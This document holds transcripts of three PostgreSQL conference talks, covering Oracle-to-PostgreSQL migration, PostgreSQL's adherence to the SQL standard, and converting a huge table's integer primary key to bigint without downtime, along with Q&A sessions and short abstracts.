in Python or Perl, which can be used inside the database in Postgres. To some small extent, the orafce extension provides compatibility functions that make migration easier. Migrating triggers is pretty straightforward; usually all you have to think about is that in Oracle the code is part of the CREATE TRIGGER statement, whereas in Postgres there is a trigger function and a CREATE TRIGGER statement. So it's typically a pretty mechanical translation, but you have to do it. Sometimes you can do without the trigger: if it's just a trigger that sets a value from a sequence, you can get away with a default clause in Postgres and simplify everything. One thing we do not have in Postgres yet are logon triggers, that is, code that runs after a database session has been established; you have to move that to the application. Now, SQL. Where does SQL occur? Not only in application code, as we would expect, but also in view definitions, of course inside PL/SQL code, and column default clauses and index definitions can also contain SQL expressions. Often SQL is SQL, one would think, but there are dialects, and very often you will have to translate something; tools, again, may help here. I will show you the most frequent problems with translating SQL between Oracle and Postgres. First, the outer join syntax with the plus sign: this weird syntax can always easily be translated to standard-conforming syntax, because the standard-conforming syntax is actually much more powerful. Not difficult, but annoying. Similarly, empty strings; this may be the most annoying thing. In Oracle, an empty string and a NULL value are the same, which wouldn't bother us except that string concatenation works differently in Oracle: if you concatenate a NULL value to a string, the result is not NULL but the string, so NULL is treated like an empty string there. This is annoying, so wherever there are string concatenations, you have to translate them either to the concat function, which does exactly what Oracle concatenation does, or sprinkle the code with coalesce calls that replace the NULLs with empty strings. A frequent and annoying problem. Current date: there are the standard functions in Oracle, but most people use sysdate and systimestamp, which are proprietary. So again, search and replace; the literal replacement for systimestamp would be clock_timestamp, but sometimes current_timestamp might be more appropriate. Annoying, but you have to do it. And finally, sequences: you fetch the next value from a sequence in Oracle with a pseudo-column called nextval, whereas in Postgres you call a function nextval. Again, simple, but search and replace.
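Much of this is mechanical enough to script. As a hedged illustration only (a real translator such as ora2pg handles far more cases and corner cases), a few of those rewrites could look like this in Raku:

    # A few mechanical Oracle -> PostgreSQL rewrites; real migrations need much more care.
    sub translate-sql(Str $sql is copy) {
        $sql ~~ s:g:i/ 'SYSTIMESTAMP' /clock_timestamp()/;
        $sql ~~ s:g:i/ 'SYSDATE' /current_timestamp/;
        $sql ~~ s:g:i/ (\w+) '.NEXTVAL' /nextval('$0')/;
        return $sql;
    }

    say translate-sql(q{INSERT INTO t VALUES (my_seq.NEXTVAL, SYSDATE)});
    # INSERT INTO t VALUES (nextval('my_seq'), current_timestamp)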
Migrating the application can be hard and it can be easy. It can be hard if your SQL code is composed in functions sprinkled all over your application code; then you have to change a lot. Or it can be trivial if you have an object-relational mapper or some other abstraction layer that ideally supports both Oracle and Postgres. However, even if it is trivial, you have to test thoroughly, and that's also time-consuming, because some problems, some differences, for example with transaction handling or concurrency, will only surface at this level. Everything will build fine, compile fine, run fine in a single test, but there may be weird interactions. So test everything, test it well. Finally, something about the tools. There are some forks of Postgres that make life easier. There is EnterpriseDB's proprietary Postgres fork that is specifically tuned for Oracle compatibility, so that will really make it much easier, but never believe it if they try to tell you that it's just a drop-in replacement; it's not true. There will still be problems, just far fewer. Still, think twice: if you go to EnterpriseDB's closed-source fork, you'll end up in a closed-source cage again, in just the same situation as you were with Oracle before, only cheaper. Do you really want that? Maybe. Okay, but think about it. Then, as I said, there's the free orafce extension that provides some of the Oracle functions and some replacement for packages, and it can make your life easier. I think migration is very often painful, and if you undergo that pain, then suffer a little more, translate a little more, and end up using standard, open-source, free Postgres, and enjoy all the advantages of open source. It's up to you, of course. Okay, the tools proper. There's ora2pg, the most widely used open-source migration tool. It's a Perl script, not totally bug-free, but much used, time-tested, proven. It's a decent solution: it generates a DDL script that you modify as needed, and it exports and imports the data for you. It takes time, but it is usable. It makes some attempt at translating PL/SQL, but that's more search-and-replace and pretty limited. Then there's my personal tool, my baby, ora_migrator. I implemented it to use the Oracle foreign data wrapper: it uses the foreign data wrapper to migrate data and metadata. The nice thing about this is that it moves the data directly from the Oracle database to the Postgres database, so there's no export and import; it's faster, and you can parallelize it to some extent, though not perfectly. The big drawback is that you have to install the Oracle foreign data wrapper in the target database; if you want to migrate to a hosted database, that's usually not an option, so ora_migrator would be out in that case. It makes no attempt to migrate PL/SQL, and only very little SQL. I added a very simple replication solution for low-downtime migrations; it's pretty crude, it uses triggers on all Oracle tables, which is often not something you can afford. Finally, there is our CYBERTEC Migrator. That's a closed-source, commercial tool. It has a nice migration workflow that makes things easy, it's highly parallelizable, and it has PL/SQL conversion that's not just search-and-replace but much smarter. Nothing's perfect, of course; we are currently developing change data capture for close-to-zero-downtime migrations. Check it out, maybe it's the tool for you. Okay, that's all. I'm taking questions now. Thank you for your attention.
I'll walk you through all the problems and difficulties that can occur when you migrate an Oracle database to PostgreSQL, from the conceptual phase and general architectural differences to the specific problems that you are likely to encounter. I'll suggest solutions or promising ways to tackle these problems and give you a brief overview over some of the existing tools that facilitate Oracle migration.
10.5446/53265 (DOI)
Good afternoon. My name is Simon Riggs and I'm a Postgres Fellow with EnterpriseDB, or EDB. I'm going to be talking to you today about PostgreSQL and the SQL standard, and this is a 25-minute presentation. So, Postgres is the world's most advanced open source database, and one of the reasons why it's the most advanced database is that Postgres has very good adherence to the SQL standard, which has been very beneficial in showing us the way for databases to develop, and we've done our best to implement the standard to its full extent across many years. So what exactly is the SQL standard? Well, probably the best way to explain it is simply to show you a copy of the standard. This is a document that's 1691 pages long, and it has things within it that express the syntax of the language we're looking at. Here you can see that the table definition consists of CREATE TABLE, and then there are scoping, sub-clauses and other types of information, all provided in exact detail, so that we know exactly what the standard is and what it is not. So that's the syntax, but then also within the standard we have various syntax rules that explain what each part of the syntax means and what types of things it needs to contain. So actually it's extremely well laid out, and it's fairly clear what we need to do. It is very detailed, however, and it does require some experience to read properly, but even so it's extremely clear as to what we should be doing. So, if I go back to the main presentation now. The SQL standard is published by the International Standards Organization, or ISO, and it's also co-published by the International Electrotechnical Commission, which is a rather grand title, and that's why it gets the title ISO/IEC. It then gets a number, because all of the different standards have a number; the SQL standard is 9075, so it's ISO/IEC 9075. Now, this was originally published in 1992 and is updated regularly, not on a particular cadence, but you'll see that versions arrived roughly every three to five years over that time period. Each new publication supersedes the previous one, or in other words it's a bit of a moving target, but most of the time the changes are simply additions of new structure or new keywords, so it's not that difficult for us to track. The latest version of the SQL standard is being voted on now, and the deadline is in February 2021, so unfortunately we haven't got a lot of time to discuss the forthcoming changes in order to influence the vote, but it's good to know that the SQL standard is being advanced and there will be additional changes to it coming soon. You might also know that the standards are voted on at a country level, so in the US there's something called the ANSI committee, the American National Standards Institute committee, which is why you'll sometimes hear the SQL standard talked about as the ANSI standard; but that's just the perspective of our US colleagues, in other countries the committees are called other things, and all of these different bodies feed into the International Standards Organization, which is the main host for the SQL standard. Now, the standard is actually spread across 16 different parts. The document that I showed you, the one that was more than a thousand pages long, was simply SQL/Foundation, and there are another 15 documents that contain the other parts of the standard.
Now, I've highlighted here which parts we follow. For example, the foreign data wrapper technology is all based around the management of external data, or SQL/MED; the information schema is based around SQL/Schemata, and our XML compliance basically comes directly from the standard. And here you'll see there's a new one emerging called SQL property graph queries, which I'll talk a little bit more about in a minute. The compliance for PostgreSQL is shown very clearly in the documentation, and that allows you to see which things we support and which things we don't. Obviously 25 minutes is not long enough really to go into a lengthy discussion of which things we support and which things we don't, but in general I think we can pull out a few things: there is this thing called the call-level interface, which we don't really support, and persistent stored modules, that is in-database functions or procedures written in the standard's own language, which we don't really support either. But quite a lot of the main aspects of SQL we completely and fully support, with just a couple of small deviations from the standard. For example, with triggers we execute them in alphabetical order, whereas the standard specifies that they should be executed in the order in which they were created, which leads to non-deterministic behavior, so it's easier to do it the way that we do it. But there are very few examples like that; most of the time we follow the exact standard completely to the letter, as far as we can. So, some of the things I'd like to show you today are the key features of the SQL standard, and I can discuss at what point these things were adopted by PostgreSQL and at what time they were actually suggested as part of the SQL standard. In many cases PostgreSQL was actually ahead of the standard. For example, sequences were introduced into PostgreSQL in version 6.1 in 1997, but they didn't become part of the SQL standard until 2003, so we were six years ahead of the standard in that particular regard. The LIMIT clause was introduced into PostgreSQL 6.5 in 1999, and yet that didn't go into the SQL standard until 2008, so again nine years ahead of the standard. And with TRUNCATE, which emerged in PostgreSQL 7.0, we were eight years ahead of the standard, which is always good. But I take that not so much as a massive win for PostgreSQL as a sign that it's nice to know the SQL standard does actually follow the practical implementations it sees out there, so in essence PostgreSQL was influencing the standard, which is a very good thing. There are other parts of the SQL standard, some of them reasonably well known, others not. You can see window clauses came into the standard in 2003, but PostgreSQL didn't implement them until 2009. Now, that's not because we didn't understand or disagreed with the standard; it just wasn't appropriate at that time to work on that feature. Obviously, as PostgreSQL was maturing as a product, we needed to work on other things in different priority orders, so that's why it took us a while to work on that one. Again, WITH clauses and recursive queries were supported in PostgreSQL 8.4, and you can see that was actually 10 years after these were added to the standard.
Now, you also see things like the XML clause, which was added in 2009, and you'll see that we were very prompt at adding that; that's really because the functionality around it was mostly just syntax, so there wasn't much for us to do in order to get it supported. And then the last four that I'm going to talk about: you'll see that the MERGE clause arrived in the standard in 2003, and there's a patch for PostgreSQL 14 to support that. There's also a patch for system-versioned temporal tables, which came into the standard in 2011. I marked that as incomplete when I wrote this presentation, but one of the things I've done in the last week was to finish off the patch, so it's pretty complete now; please ignore the incomplete bit. There are also things like the procedural language, which I said we don't support; of course we have had things like PL/pgSQL in PostgreSQL since PostgreSQL 6, but we just didn't have an SQL-standard-compliant language in PostgreSQL, and again we have a patch for that in PostgreSQL 14. And the same with JSON. The strange thing about JSON is that, again, PostgreSQL has really led the way in implementing JSON features in an SQL database, and that's what led to the JSON features being standardised, but what you do notice is that the standard is actually different from where we were with the PostgreSQL features, so we've got a bit of catching up to do there to make it exactly compliant. So what I'm going to do now is just go through some of those features, so that you're familiar with the types of things that the SQL language contains, because in my experience many people haven't actually seen some of these things close up or had them explained to them. So if you'll excuse me, I'm now going to go through, one by one, some of these quite interesting features of the SQL standard. Let's start with window functions. One of the things that you may have learnt when you first looked at SQL is that the SELECT statement retrieves rows from a table without regard to the ordering of the rows in the table, and the only way to get a defined order out of an SQL SELECT statement is by adding the ORDER BY clause. What window functions do is introduce the concept of ordering between rows, to allow you to calculate different types of query. In this particular case, we can see a query that has an OVER clause, and what this does is calculate the average over the last three hours, which is not the same thing as the last three rows. In fact, there might be only one row in the last three hours, or there might be 300 rows; you don't know. So the specification here is actually a time range rather than a fixed number of rows, which is quite an interesting way of doing it, all supported by the SQL standard, and it allows us to calculate a moving average rather than just using the latest value of the metric when we're looking at the data. This is quite important, because it recognises the role and importance of time series within databases, and obviously I'm hinting towards an Internet of Things type of application here, since we're using the words measurements and metrics. So this is quite an important addition to the standard, and it has been quite well optimised in PostgreSQL and allows you to access the data very efficiently, so that's very cool.
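Purely as an illustration, here is a hedged sketch of running that kind of moving-average query from a Raku client via DBIish; the table, the columns and the connection details are invented for the example, and the window frame mirrors the three-hour range described above.

    use DBIish;

    # Invented schema: measurements(ts timestamp, value double precision).
    my $dbh = DBIish.connect('Pg', :database<metrics>);

    my $sth = $dbh.prepare(q:to/SQL/);
        SELECT ts, value,
               avg(value) OVER (ORDER BY ts
                                RANGE BETWEEN INTERVAL '3 hours' PRECEDING
                                          AND CURRENT ROW) AS moving_avg
        FROM measurements
        ORDER BY ts
        SQL
    $sth.execute;

    say "{.<ts>}  {.<moving_avg>}" for $sth.allrows(:array-of-hash);
    $dbh.dispose;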
It does take a little bit more effort to write these type of queries but you know obviously if you don't know they exist then you're not going to write them at all so that's one of the things I'm trying to do here is explain to you what's actually possible. So moving on to the next one then is recursive queries and you'll note that some people have said that graph queries require their own special language and it's true you need a special formulation of a query in order to get it to work correctly with graph or hierarchical data but you don't need a different language other than SQL. SQL is actually fully sufficient in the SQL standard form as a way of executing graph queries and that's because the SQL standard supports this particular keyword recursive. So what this does is it starts with a starting condition where you define which nodes of a graph that you're going to start from and then this recursive term gets repeatedly applied to the graph until the query stops executing and it gives you a full result and what that allows you to do is it allows you to search through any level of complexity in a graph database and I won't explain some of these terms but that's related to making sure that the query doesn't infinitely recycle around the graph and things like that. So that shows that SQL supports graph queries and there are some additional terms being added to PostgreSQL in 14. We've got the search and the cycle clause which affects various options for how you search through data. Now very interestingly there's some standards work underway to bring graph query languages directly into SQL to make it slightly easier to write graph style queries. So the first of these is known as property graph and that is going to be added to the SQL standard possibly in 2021 but possibly in 2022 not quite sure but it is going to be called SQL slash PGQ and it's quite a structured way of defining graph queries and then beyond that there's also another initiative to bring graph query languages into SQL and there's a second initiative with a much more generalized form of graph query that we're involved with the work on to a certain extent. Anyway these are exciting times and what we're seeing is the SQL language growing and changing in response to the needs of users needing to look through different types of data. So again exciting times. Another statement that's of particular interest is something called the merge statement. What this allows you to do is it allows you to join the source data with the target data and based upon that join you can decide whether you're going to insert the rows or whether you're going to update. So if the join finds a match then you can do an update or delete and if it doesn't find a match then you can insert rows and you can also specify additional conditions such as insert when that condition is met. What this does is it turns SQL into quite a complex load utility. It allows you to process data in quite advanced ways and that is a very important capability for large data and particularly for analytics systems. But what we find with this statement is that it can load. Simon is experiencing some technical problems here so he wasn't able to join us for the QA session and also it looks like the video has been cut off a little bit which is a pity. Maybe we find an option to put the full length videos online somewhere else. 
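Before the Q&A picks up below, two minimal sketches of the features just described. Table and column names (edges, orders, staging_orders and so on) are invented, and at the time of this talk MERGE was still only a proposed patch rather than a released PostgreSQL feature, so the second sketch follows the SQL standard's syntax.

```sql
-- Recursive query: find every node reachable from node 1 in a graph stored
-- as an edge list. UNION (rather than UNION ALL) stops infinite cycling;
-- PostgreSQL 14 adds SEARCH and CYCLE clauses for finer control.
WITH RECURSIVE reachable(node) AS (
    SELECT 1                      -- starting condition
  UNION
    SELECT e.dst                  -- recursive term, applied repeatedly
    FROM edges e
    JOIN reachable r ON e.src = r.node
)
SELECT * FROM reachable;

-- SQL-standard MERGE: join source to target, then update, delete or insert.
MERGE INTO orders AS t
USING staging_orders AS s
    ON t.order_id = s.order_id
WHEN MATCHED AND s.cancelled THEN
    DELETE
WHEN MATCHED THEN
    UPDATE SET amount = s.amount
WHEN NOT MATCHED THEN
    INSERT (order_id, amount) VALUES (s.order_id, s.amount);
```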
But Simon is in chat as far as I can tell, so he can answer questions there, and once the next video starts playing, the private room for this talk will open, so he will be answering questions there as well. Oh, there he is, he just came on. Hello Simon. I have no idea if you're large on the screen now, but anyway, we had a couple of questions that you already answered in chat; for the people only watching the stream, maybe we can go through them. One of the questions was: who is representing Postgres on the standards committee? Yeah, we're not fully represented on the standards committee in the way that we would like to be. My understanding is that's because of some difficulty in the way the standards body works: the voting is done at international level, so all of the individual countries have their own committees. A lot of the work on the SQL standard happens within the US committee, and for example myself and Peter Eisentraut don't have access to that committee because we're not US nationals. So it's a little bit confused in terms of the way that works. Obviously we'd like multiple people to be involved there, but the standards process itself is quite involved — it's almost a full-time occupation to be involved — and frankly we don't have the manpower. Peter's been doing a lot of it, and I've been tracking some of that work for some years now, and there are some other people involved, but writing the features as well as tracking future proposed features is a lot of work, so we're doing what we can with the available resources, which is not very much. Thanks. Then somebody mentioned ENUMs and why they are not in the SQL standard? Well, let's be honest, I think the answer is probably that Oracle didn't invent them, right? But it might change in the future. I would say we have been successful in getting things like the concept of the LIMIT clause in — it's not called the LIMIT clause in the standard, but it is the LIMIT clause — and JSON, for example, is a really big demonstration of how a feature can be implemented; it was Postgres' implementation that really drove everybody else to adopt it. So that's a very big success. And I think the situation now is that, as of the 13th of January this year, open source databases are more than 50% of the noise in the market about databases, and so that will begin to change. That's also why we're starting to take the involvement with the standard a lot more seriously, because basically it's our standard, not just somebody else's standard that's being implemented. Yeah, knock on wood. Then Stefan Keller asked: how close is the PG 14 implementation of jsonb paths to SQL property graph query, PGQ? Yeah, so that was a little bit confused, which I think Stefan realised. Property graph query is a section of the standard relating to graph queries, and what the SQL standards committee is trying to do is simplify the way that graph queries are written. Now, one of the things that people don't really want to admit to — which is what I answered in the presentation — is that you can already write graph queries using SQL.
It's just that a lot of companies tell you that you can't which is a bit confusing and so as a result they're then trying to put some more keywords and some structure into SQL to make it clearer how to write a graph query so so that is a bit strange but we don't think there's an awful lot of work to do to make that happen. Now let me differentiate between following the standard and fully optimising all graph queries are like separate things right but the actual standard should be fairly clear when it when it arrives in full and we will be able to implement that directly. Now so all of that's completely separate from json right it's just a separate branch of the standard okay and so we're pursuing those on parallel tracks. Oleg and his team at Postgres Pro are doing a lot of work on the standard but that is also supported by other people that are reviewing and committing the work that's being done so yes so parallel tracks is the best way to describe that. Yeah I know what you mean I mean it still feels a little strange to recommend people writing fetch first 10 rows only instead of limit 10 so the verbosity in the SQL standard is often impressive so then we have a question why does Oracle have such an impact on the standards? Well I mean historically I mean the level of resources that commercial companies can apply to software development is significantly different right I mean that's not an argument against open source it's just a recognition right so Oracle has been a you know a billion dollar company and they can afford whole teams of people to allocate to track in the standard and you know historically we've not been able to do that so you know and obviously with the whole market being more interested in commercial databases historically clearly you know the in former times the impact from commercial databases was greater but I mean what I'm saying is that with the rise of influence of open source databases we will see a corresponding change in the level of influence that we have on the standard and that's why that's why I'm doing a talk on the SQL standard here and that's why we're doing more work because our influence will grow and as long as we take it seriously obviously if we go well of course dudes we just ignore everybody else right then that's a really bad thing to say I mean my view is you know we're open source people we're implementing things directly into core PostgreSQL but that also means that we want to work with the other communities that are involved in standardizing things you know I mentioned them in the talk you know the the Unicode standard the IETF change requests that are coming through and the SQL standard and various things like that we need to
PostgreSQL follows the SQL Standard. What's that mean? Why do we care? Covers the history of the SQL Standard, the complex and interesting bits and how it is implemented in PostgreSQL, plus current in-progress patches and details for PG14.
10.5446/53267 (DOI)
Hello, virtual FOSDEM. My name is Jimmy Angelacos and I work as a senior Postgres architect at EDB. And today we're going to talk about changing your huge tables, data types and production. What is the motivation for this talk? First of all, we appear to be still in the era of big data, whatever that means, which means that along with everything else, Postgres has been seeing more heavy use with bigger tables and bigger data sets. Also Postgres performance has allowed this because it keeps getting better by the day. So you may find yourself in a situation where your database is facing rapid growth and you need to find a way to deal with that. So perhaps your growth is too rapid and you need to mitigate some decisions that you've taken early on. So why would you want to change data types on your database tables, especially if they're in production? First of all, you may have an incorrect data type. So something which was not suitable for what you wanted, like you have set a limit for VARCAR, which is not enough for your purposes. So you want to change it to variable length text. Secondly, you may want to change a non-optimal data type that you entered in your table. So for example, an ID column that is text that takes up nine bytes for an integer column that stores this ID for only four bytes, which will help your table scale better. Also, you may come across the situation of running out of IDs. If you have an integer ID column, the maximum limit is 2.1 billion, a little bit over that. So you may come across the situation of ID exhaustion. And in that case, what do you do? How do you keep your application running? Of course, you know that you can change types. You can change types only if they are compatible, though. So what you need is for data types that you, for the old data type to be binary-corrosable to the new type. So for example, XML can be converted to text very easily without any conversion function needed to be invoked. However, text to XML conversion requires a function to be run. So they are not binary-corrosable in that direction. And you can also have binary compatible columns and data types that have exactly the same internal representation in Postgres, such as text and VARCAR. So the way you do it is you have the alter table, alter type statement. It's a dvl command that lets you alter table, alter the column name to type the data type you want. You may also need to use the using expression if there is no implicit cast between the first and the second type, which needs that you may have to drop the default value for that column, run the alter table statement, and then add another default for the new data type. And this requires indexes to be rebuilt, even if the table doesn't have to get rewritten. So what is the problem here exactly? Alter table, alter column requires an access exclusive lock in order to change types. So that means that nothing can take place on that table. No reads and no writes are allowed to any other transaction. And this effectively stops us from using the table in production, which is a bad thing. Moreover, if the old data type and the new data type are not binary courseable between them, then you will have to rewrite the entire table, which is of course slow and requires double the disk space. So let us look at one possible scenario that you may encounter. Let's say that you have a huge table in production that is 1.7 billion rows. And you have a primary key, which is integer. 
So because of rapid growth, your table that is now 1.7 billion rows can become 2.1 billion rows very soon, and you find that bigint, which doesn't have the 2.1 billion limit but is much larger, is the solution to your problem. However, integer and bigint are not binary compatible, because bigint is eight bytes and integer is four bytes, so you would have to rewrite the table. How do you avoid having to lock the table in production and take everything down? If you cannot take a maintenance window to perform this lengthy operation, you need a concurrent solution, so let's look at one possible concurrent solution that can work. First, we add a new bigint column to the table. Then we write a procedure that copies values from the old primary key column to the new bigint column, and we do it in batches so that we don't affect the performance of the system too much. At the same time, we need to keep using the table and keep being able to write to it, so we write a trigger that replicates changes from the old column, which your application is aware of, to the new column, which is practically invisible to your application. After we have treated the entire table and copied everything from the old column into the new bigint column, we can drop the old column, rename the new one to the name of the old column, and make it the primary key. Let's look at a few details of what exactly needs to take place here. One detail is that we need to create a sequence for the new primary key. We also need to create the new primary key index. And after the conversion, we had best perform all of the DDL that does the column dropping and renaming in one transaction, in order to be safe; by keeping it in one transaction, Postgres tries to execute it as fast as possible, so we encounter the minimum possible locking or blocking of other operations by other users of our database. The test system used to test this procedure was, basically, a laptop, and we created a table with 1.7 billion rows of 170 bytes each. So let's see how we create this example data. We create a table called large_table with an integer ID column and a text content column, then we insert our Lorem Ipsum into the table to populate the content column, generating a series from 1 to 1.7 billion because we want 1.7 billion rows in the table. The insert takes quite a bit of time — 32 minutes — which is not too bad because we haven't created any indexes yet. Then we create a sequence for the large_table ID column, starting at the very next number after 1.7 billion, we set the default for the ID column to be this sequence, and we create the index for the primary key; that takes 26 minutes on the test rig, so make of that what you will. Then we need to add this unique index as the primary key constraint to the table: ALTER TABLE large_table, add the primary key using the index we have just created, and that takes a very short time. So let's say that our data is now in production and our table looks like this: it has a primary key, a sequence, and an integer ID column, and we find that the size of our table is 265 gigabytes — not small by any means. The content of the table looks like this: an ID from 1 to 1.7 billion and some content. If we select the number of live tuples, which we can see from pg_stat_user_tables, we have 1.7 billion rows in large_table. The first step is to add the new column.
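A condensed sketch of the example-data setup just narrated (reconstructed from the talk, so the exact statements on the slides may differ slightly); the next step, adding the new bigint column, continues below.

```sql
CREATE TABLE large_table (
    id      integer NOT NULL,
    content text
);

-- 1.7 billion rows of roughly 170 bytes each; took about 32 minutes
-- on the test rig because no indexes exist yet.
INSERT INTO large_table (id, content)
SELECT n, 'Lorem ipsum dolor sit amet ...'
FROM generate_series(1, 1700000000) AS n;

CREATE SEQUENCE large_table_id_seq START 1700000001;
ALTER TABLE large_table
    ALTER COLUMN id SET DEFAULT nextval('large_table_id_seq');

CREATE UNIQUE INDEX large_table_id_idx ON large_table (id);  -- ~26 minutes
ALTER TABLE large_table
    ADD CONSTRAINT large_table_pkey PRIMARY KEY USING INDEX large_table_id_idx;
```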
And if we make sure that the new column has a default of 0 then that can be an instantaneous operation because it is non-volatile. So alter table, large table, add column ID underscore new. Big integer is what we want this time around. We want the column to be not null and we set a default of 0. And that takes a very short time like 13 milliseconds. Next we need to build the trigger function to replicate the changes that are coming into our table while our conversion script is running. That copies everything from the old ID column to the new ID column. So we create the function large table trigger function returns trigger. And the only thing it does is when the value changes in the table we make sure that ID new takes the value of ID. So we create the function and then we need to add the trigger to the table that runs this function. So create trigger large table trigger. Before insert or update on large table because we want to replicate the changes the new column for each row execute the function large table trigger function. So now anything that changes in our table while we're running the conversion procedure is going to affect the new column as well. The conversion procedure, I'm sorry if the text is a bit cramped but we'll look at it in detail. We define a cursor for select ID from large table because we want to examine every single ID of that table. We define a batch size so we're going to do it in batches of 100,000 rows at a time. So we begin a loop of updating our large table and setting ID new equals ID for each one of the rows that we've selected. We increment our counter to determine where we are in the batch and every 100,000 rows so count modulo batch size equals 0 then we commit. So we don't commit with every row we commit with every 100,000 rows for performance reasons. That ends the loop and after we're done we commit and the procedure is over. Now what is important here is that we weren't able to do this with functions so we are taking advantage of the fact that procedures in Postgres offer us transactional control and we can do things such as begin transactions, commit them at will, rollback and so on. So what if we want this huge task to give us some progress indicator so we can add in the loop if count modulo batch size multiplied by 10 then raise notice rows done. So it will tell us every million rows 10 times our batch of 100,000 that the number of rows that have already been processed by the script. So now it's time to do it. We call the large table sync procedure and we see that it's processing 1 million rows, 2 million rows, 3 million rows and so on. Now to check that our procedure isn't actually blocking anything and users are not prevented from using the table let's select something from our large table, a random selection of one row and we use the backslash watch command in psql to run it every second. So every second we get an id from the table and another id the next second and so on. So we keep it running and we see that because it runs it means we're not blocking our users from reading from the table and also they're not prevented from writing to the table. So now we wait and seven hours later we see that our procedure has completed. 
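For reference, here is a sketch that pulls together the trigger and the batched backfill procedure described above. It is reconstructed from the narration rather than copied from the slides, so treat the names and details as illustrative; the final swap (drop the old column, rename, re-add the primary key) happens later in a single transaction, as described next.

```sql
-- New column; a constant (non-volatile) default makes this instantaneous.
ALTER TABLE large_table ADD COLUMN id_new bigint NOT NULL DEFAULT 0;

-- Trigger: keep id_new in sync for rows written while the backfill runs.
CREATE FUNCTION large_table_trigger_function() RETURNS trigger AS $$
BEGIN
    NEW.id_new := NEW.id;
    RETURN NEW;
END;
$$ LANGUAGE plpgsql;

CREATE TRIGGER large_table_trigger
    BEFORE INSERT OR UPDATE ON large_table
    FOR EACH ROW EXECUTE FUNCTION large_table_trigger_function();

-- Backfill in batches; a PROCEDURE (not a function) so COMMIT is allowed.
CREATE PROCEDURE large_table_sync() AS $$
DECLARE
    batch_size CONSTANT int := 100000;
    cnt        bigint := 0;
    r          record;
BEGIN
    FOR r IN SELECT id FROM large_table LOOP
        UPDATE large_table SET id_new = id WHERE id = r.id;
        cnt := cnt + 1;
        IF cnt % batch_size = 0 THEN
            COMMIT;                            -- commit every 100,000 rows
        END IF;
        IF cnt % (batch_size * 10) = 0 THEN
            RAISE NOTICE '% rows done', cnt;   -- progress every million rows
        END IF;
    END LOOP;
    COMMIT;
END;
$$ LANGUAGE plpgsql;

CALL large_table_sync();
```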
It is done processing 1.7 billion rows and it took seven hours and six seconds on the test rig which is not too bad for something which is running concurrently and remember the purpose of this procedure is not to run fast, it is not to overpower your system and affect your performance so negatively while you're doing it that nobody else is able to use your table. So what does our table look like now? It has an id column, the content that it had and an id new column which is identical but is big integer instead of integer. Now we need to create the index for our primary key. So create unique index concurrently, we name it large table id new index on our large table and we created on the new id column that is big int. So index creation takes an hour and 17 minutes and now we haven't really made any changes to the table so it's the time to run the ddl all at once as we said so we're going to use an anonymous code block to execute all of it. So we need to find the new start for our sequence so we select the max id from large table into the variable new start then we create a sequence and we concatenate new start to the end of that statement that we then execute so create sequence large table with that number then we alter table to set the sequence to be the default for our column id new and then we drop the id column rename id new to id and then we add constraints the primary key using the index we just created in the last step we drop the trigger and we commit at the moment we commit all of the ddl is going to execute at the same time and it shouldn't block the table for very long at all and it shouldn't have any other negative consequences so we run it and we see alter table add constraint using index is a warning that postgres throws and says it will rename the index from large table id new index to large table id primary key which is fine and it does it and it only takes 451 milliseconds so less than half a second on our test rig and now we're all done we have changed our huge table uh primary key from integer to big integer without affecting the operation of our system so thank you very much and this is the background photo that was used uh you can find me on twitter and i am open to your questions now thanks very much for listening all right i assume that we are going to have the broadcast in any moment i just told you now to avoid this awkward silence and so we have a few questions thank you so much jimmy for this specific i work around so you came with this idea probably from a life uh existing issue right can you tell us whether there was something you just wanted to study or or this is a real problem that you faced yeah yeah it's a real life problem um people start using um primary keys with hint and it actually happens that sometimes they run out of integers because of the number of transactions or number of customers that they add in their database so it is a real world problem nice not not just a case study so good so a question coming from the audience is it advisable to change a value in a column while changing the data type so for instance changing text to a boolean and set all empty fields to false sorry i don't understand the idea is that you change the data type yeah but you also change the values when you're doing that all the same time oh you can do that well if you if you set your conversion function to change everything and also the trigger that deals with the incoming values then sure you can do that whether it's something that you want to do if you want a consistency 
in your application is a different story because as as we said this example is on running live database so maybe your application is not expecting the values to be changing right yeah and also because you're mentioning is a live database so there are new integers that are coming in the primary key there is a question or a comment about the the sequence of the big integer that you're creating when you're changing whether it is advisable or not just set it to a higher value so that you avoid any race conditions while doing the switch right yeah so in this case i just selected the max integer and because nobody was writing into my table in my laptop then it didn't change but yeah certainly it's a good idea to skip a few numbers ahead when you're creating the sequence good okay thanks for clarifying that there is another question here saying how big the table became after you updated all the rules um it grew but not to twice its size so it's a bit better than rewriting the entire table and also if you have auto vacuum running because you have multiple transactions then it's able to clean up a bit better than doing it in one huge transaction so any maintenance you have to do like after you do all this change because probably you would like to do a vacuum full but it's not possible of course and it's not kind of a advice you just run vacuum full in such a large table but yeah it's probably a good idea to analyze after you've changed your data type analyze okay yeah that's good for the statistics i also see a question about um uh declaring the cursor with hold you can't do that that's an sql thing if you declare the cursor um in plpg sql you don't need to save with hold right okay yes thanks for clarifying that one as well okay so i don't i don't see much questions uh at the moment but we already have a several ones so that's just being good anything else that you would like to add from the presentation that i say like okay i forgot to mention this that would have been valuable for the presentation um probably it doesn't uh what i would like to have done if i had the time is uh show a few more different data conversion so in this case we saw that it's just a one-for-one copy of an integer into a big end and it fits precisely um but possibly there are other use cases and if you're interested then perhaps i can have a follow-up or add a few slides in my presentation with different use cases okay excellent and uh more like a practical question because this was not your database when you said that this was inspired by a real-life case you needed to work together with let's say the customer that was running how how how what do you have to do as a dba to convince the developer of the project management in order to have this kind of maintenance uh window that you need to have for all this change well this didn't require maintenance window that's the whole point uh so it was the only acceptable solution in some cases uh so um when your management says that you cannot take the database offline because we'll be using money for example uh then it's the only thing you can do you can only go for some concurred solution yeah okay thanks for clarifying that that's the the value of this specific workaround so that's nice good um iila do you have anything else to add no thank you thank you jimmy for your talk it was really interesting um we have three more minutes for questions and then this live will interrupt so yeah if there are any questions ask them now or else we can continue this conversation in the room 
of the talk, which will be available in three minutes. Thanks everyone, thanks very much.
You have a huge table, and it is necessary to change a column's data type, but your database has to keep running with no downtime. What do you do? Here's one way to perform this change, in as unobtrusive a manner as possible while your table keeps serving users, by avoiding long DDL table locks and leveraging procedural transaction control.
10.5446/53269 (DOI)
